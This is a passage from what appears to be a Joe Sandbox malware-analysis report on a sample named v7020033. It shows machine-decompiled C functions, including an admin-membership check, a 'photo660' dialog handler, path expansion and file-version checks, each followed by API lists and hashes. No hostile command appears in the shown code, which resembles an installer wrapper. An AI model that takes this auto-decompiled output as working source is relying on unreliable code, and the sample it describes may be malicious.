                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6066f470fc45a2ebc55d483eb04900684e7eed695259f221c0a3c8d8124f205
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7331AB31A11219AFDB218F21DC4CBEFB7B8EB65328F0441A5E90DA3140DB349AD5CF52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002117EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E002117EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x218004; // 0x58ac7c6d
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x21a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00216CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                        0x002117f6
                                                                                                                                                                                                        0x002117fd
                                                                                                                                                                                                        0x00211805
                                                                                                                                                                                                        0x0021180b
                                                                                                                                                                                                        0x0021180d
                                                                                                                                                                                                        0x00211815
                                                                                                                                                                                                        0x00211818
                                                                                                                                                                                                        0x00211820
                                                                                                                                                                                                        0x00211824
                                                                                                                                                                                                        0x0021182c
                                                                                                                                                                                                        0x00211832
                                                                                                                                                                                                        0x00211837
                                                                                                                                                                                                        0x00211851
                                                                                                                                                                                                        0x00211854
                                                                                                                                                                                                        0x0021185d
                                                                                                                                                                                                        0x00211862
                                                                                                                                                                                                        0x0021186c
                                                                                                                                                                                                        0x00211872
                                                                                                                                                                                                        0x00211877
                                                                                                                                                                                                        0x0021187e
                                                                                                                                                                                                        0x0021187e
                                                                                                                                                                                                        0x00211883
                                                                                                                                                                                                        0x00211883
                                                                                                                                                                                                        0x0021185d
                                                                                                                                                                                                        0x0021188a
                                                                                                                                                                                                        0x0021188a
                                                                                                                                                                                                        0x002118a2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,002118DD), ref: 0021181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0021182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(002118DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,002118DD), ref: 00211855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,002118DD), ref: 00211883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,002118DD), ref: 0021188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: 057baaa059c4499f5c2031993d7d655cd54f6ce42409b1c4b6732cb582e6e8ae
                                                                                                                                                                                                        • Instruction ID: 53fd530ba67533a7bb2534069c487203aba90b1698184f2f9f129b6568125329
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 057baaa059c4499f5c2031993d7d655cd54f6ce42409b1c4b6732cb582e6e8ae
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD119331E11209ABDB109FA4EC4DBFEBBB8EF58700F11416AFA05E2290DF708D518B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00213450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00213450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E002143D0(_t24, _t12);
					SetWindowTextA(_t24, "photo660");
					SetDlgItemTextA(_t24, 0x838,  *0x219404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x2191dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                        0x00213459
                                                                                                                                                                                                        0x0021345c
                                                                                                                                                                                                        0x002134d8
                                                                                                                                                                                                        0x002134de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002134e0
                                                                                                                                                                                                        0x0021345e
                                                                                                                                                                                                        0x00213463
                                                                                                                                                                                                        0x0021349a
                                                                                                                                                                                                        0x002134a0
                                                                                                                                                                                                        0x002134a7
                                                                                                                                                                                                        0x002134b2
                                                                                                                                                                                                        0x002134c4
                                                                                                                                                                                                        0x002134cb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002134cb
                                                                                                                                                                                                        0x00213468
                                                                                                                                                                                                        0x0021346e
                                                                                                                                                                                                        0x00213474
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021347c
                                                                                                                                                                                                        0x0021348c
                                                                                                                                                                                                        0x00213490
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213496
                                                                                                                                                                                                        0x00213484
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213486
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213486
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00213490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0021349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 002134B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 002134C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 002134CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 002134D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 852535152-1757243477
                                                                                                                                                                                                        • Opcode ID: 7bfc823dace18633e10653779d9fc97097016f2214a0acb9ccfc9edfe472163a
                                                                                                                                                                                                        • Instruction ID: ab50348e1c6c6eade9315367b74756d4b4d0b9ede0d25de0eaac4099d52f8ee2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bfc823dace18633e10653779d9fc97097016f2214a0acb9ccfc9edfe472163a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8901B531261115BBD7279F64EC0C9EE3AD6EB35710F108020F94A865A0CF728FE1DB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00212AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00212AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x218004; // 0x58ac7c6d
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x219a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00211680(_t65, E002117C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E002165E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00211680(_t65, E002117C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00216CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                        0x00212aac
                                                                                                                                                                                                        0x00212ab7
                                                                                                                                                                                                        0x00212abc
                                                                                                                                                                                                        0x00212abe
                                                                                                                                                                                                        0x00212ac3
                                                                                                                                                                                                        0x00212ac6
                                                                                                                                                                                                        0x00212ac9
                                                                                                                                                                                                        0x00212ace
                                                                                                                                                                                                        0x00212ae6
                                                                                                                                                                                                        0x00212bdc
                                                                                                                                                                                                        0x00212bdc
                                                                                                                                                                                                        0x00212be0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212af2
                                                                                                                                                                                                        0x00212afc
                                                                                                                                                                                                        0x00212b00
                                                                                                                                                                                                        0x00212b05
                                                                                                                                                                                                        0x00212b05
                                                                                                                                                                                                        0x00212b0b
                                                                                                                                                                                                        0x00212bca
                                                                                                                                                                                                        0x00212bd1
                                                                                                                                                                                                        0x00212b11
                                                                                                                                                                                                        0x00212b18
                                                                                                                                                                                                        0x00212b26
                                                                                                                                                                                                        0x00212b99
                                                                                                                                                                                                        0x00212bc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212b9b
                                                                                                                                                                                                        0x00212bae
                                                                                                                                                                                                        0x00212bb3
                                                                                                                                                                                                        0x00212bb5
                                                                                                                                                                                                        0x00212bb5
                                                                                                                                                                                                        0x00212bb8
                                                                                                                                                                                                        0x00212bb8
                                                                                                                                                                                                        0x00212bba
                                                                                                                                                                                                        0x00212bbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212bb8
                                                                                                                                                                                                        0x00212b28
                                                                                                                                                                                                        0x00212b2e
                                                                                                                                                                                                        0x00212b33
                                                                                                                                                                                                        0x00212b39
                                                                                                                                                                                                        0x00212b3c
                                                                                                                                                                                                        0x00212b3c
                                                                                                                                                                                                        0x00212b3e
                                                                                                                                                                                                        0x00212b3f
                                                                                                                                                                                                        0x00212b55
                                                                                                                                                                                                        0x00212b5d
                                                                                                                                                                                                        0x00212b64
                                                                                                                                                                                                        0x00212b64
                                                                                                                                                                                                        0x00212b7a
                                                                                                                                                                                                        0x00212b7f
                                                                                                                                                                                                        0x00212b81
                                                                                                                                                                                                        0x00212b81
                                                                                                                                                                                                        0x00212b84
                                                                                                                                                                                                        0x00212b84
                                                                                                                                                                                                        0x00212b86
                                                                                                                                                                                                        0x00212b87
                                                                                                                                                                                                        0x00212bbf
                                                                                                                                                                                                        0x00212bc1
                                                                                                                                                                                                        0x00212bc1
                                                                                                                                                                                                        0x00212b26
                                                                                                                                                                                                        0x00212bda
                                                                                                                                                                                                        0x00212bda
                                                                                                                                                                                                        0x00212be6
                                                                                                                                                                                                        0x00212be6
                                                                                                                                                                                                        0x00212bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00212AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00212AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00212B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00212B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00212B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00212BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: 8f281d0af32ae74a3b2570494306bf33dc460c27e8eb115d1a2dd3d8a49cb08a
                                                                                                                                                                                                        • Instruction ID: 6001d3559071fd1d5999dbed71bd1e704e1d7bc7e7e3f4c192bb1ef162142f11
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f281d0af32ae74a3b2570494306bf33dc460c27e8eb115d1a2dd3d8a49cb08a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C411334518246AEDB159F209C58BFD7BE99F76314F14409AE8C683202DF754FEA8B50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002128E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002128E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00212773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x213938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x213938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00212A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00212A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                        0x002128f1
                                                                                                                                                                                                        0x002128f4
                                                                                                                                                                                                        0x002128f7
                                                                                                                                                                                                        0x002128f9
                                                                                                                                                                                                        0x002128fc
                                                                                                                                                                                                        0x002128ff
                                                                                                                                                                                                        0x00212901
                                                                                                                                                                                                        0x00212907
                                                                                                                                                                                                        0x00212a62
                                                                                                                                                                                                        0x00212a64
                                                                                                                                                                                                        0x0021290d
                                                                                                                                                                                                        0x0021290d
                                                                                                                                                                                                        0x0021290f
                                                                                                                                                                                                        0x00212912
                                                                                                                                                                                                        0x00212920
                                                                                                                                                                                                        0x00212937
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021293d
                                                                                                                                                                                                        0x00212944
                                                                                                                                                                                                        0x0021294a
                                                                                                                                                                                                        0x0021294f
                                                                                                                                                                                                        0x00212a2f
                                                                                                                                                                                                        0x00212a32
                                                                                                                                                                                                        0x00212a34
                                                                                                                                                                                                        0x00212a37
                                                                                                                                                                                                        0x00212a41
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212955
                                                                                                                                                                                                        0x0021295e
                                                                                                                                                                                                        0x00212962
                                                                                                                                                                                                        0x00212969
                                                                                                                                                                                                        0x0021296f
                                                                                                                                                                                                        0x00212974
                                                                                                                                                                                                        0x0021297e
                                                                                                                                                                                                        0x0021298c
                                                                                                                                                                                                        0x00212a20
                                                                                                                                                                                                        0x00212a21
                                                                                                                                                                                                        0x00212a27
                                                                                                                                                                                                        0x00212a4c
                                                                                                                                                                                                        0x00212a4f
                                                                                                                                                                                                        0x00212a50
                                                                                                                                                                                                        0x00212a53
                                                                                                                                                                                                        0x00212a56
                                                                                                                                                                                                        0x00212a5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002129b2
                                                                                                                                                                                                        0x002129b2
                                                                                                                                                                                                        0x002129b5
                                                                                                                                                                                                        0x002129bd
                                                                                                                                                                                                        0x002129c3
                                                                                                                                                                                                        0x002129cc
                                                                                                                                                                                                        0x002129d5
                                                                                                                                                                                                        0x002129d7
                                                                                                                                                                                                        0x002129da
                                                                                                                                                                                                        0x002129dd
                                                                                                                                                                                                        0x002129df
                                                                                                                                                                                                        0x002129ec
                                                                                                                                                                                                        0x002129f8
                                                                                                                                                                                                        0x002129fc
                                                                                                                                                                                                        0x002129ff
                                                                                                                                                                                                        0x00212a02
                                                                                                                                                                                                        0x00212a07
                                                                                                                                                                                                        0x00212a0a
                                                                                                                                                                                                        0x00212a0f
                                                                                                                                                                                                        0x00212a19
                                                                                                                                                                                                        0x00212a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212a0f
                                                                                                                                                                                                        0x0021298c
                                                                                                                                                                                                        0x00212974
                                                                                                                                                                                                        0x00212962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021294f
                                                                                                                                                                                                        0x00212912
                                                                                                                                                                                                        0x00212a65
                                                                                                                                                                                                        0x00212a68
                                                                                                                                                                                                        0x00212a6c
                                                                                                                                                                                                        0x00212a6f
                                                                                                                                                                                                        0x00212a6f
                                                                                                                                                                                                        0x00212a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00212A6F
                                                                                                                                                                                                          • Part of subcall function 00212773: CharUpperA.USER32(58AC7C6D,00000000,00000000,00000000), ref: 002127A8
                                                                                                                                                                                                          • Part of subcall function 00212773: CharNextA.USER32(0000054D), ref: 002127B5
                                                                                                                                                                                                          • Part of subcall function 00212773: CharNextA.USER32(00000000), ref: 002127BC
                                                                                                                                                                                                          • Part of subcall function 00212773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212829
                                                                                                                                                                                                          • Part of subcall function 00212773: RegQueryValueExA.ADVAPI32(?,00211140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212852
                                                                                                                                                                                                          • Part of subcall function 00212773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212870
                                                                                                                                                                                                          • Part of subcall function 00212773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002128A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00213938,?,?,?,?,-00000005), ref: 00212958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00212969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00213938,?,?,?,?,-00000005,?), ref: 00212A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00213938,?,?), ref: 00212A81
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID: 89!
                                                                                                                                                                                                        • API String ID: 3949799724-2547314910
                                                                                                                                                                                                        • Opcode ID: 501ed3b4a4bd1536ec946bf985b7d81448e02980d0e2e8bce2382a3f8f3a8675
                                                                                                                                                                                                        • Instruction ID: 400dad617327de5ec807decb0dc72a94cf598939cdd1a7591674a43699c04119
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 501ed3b4a4bd1536ec946bf985b7d81448e02980d0e2e8bce2382a3f8f3a8675
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8051083191021ADBCB21CF98D884AEEBBF5FF68710F14806AF945E3211DB3199A5DB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002143D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E002143D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x218004; // 0x58ac7c6d
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
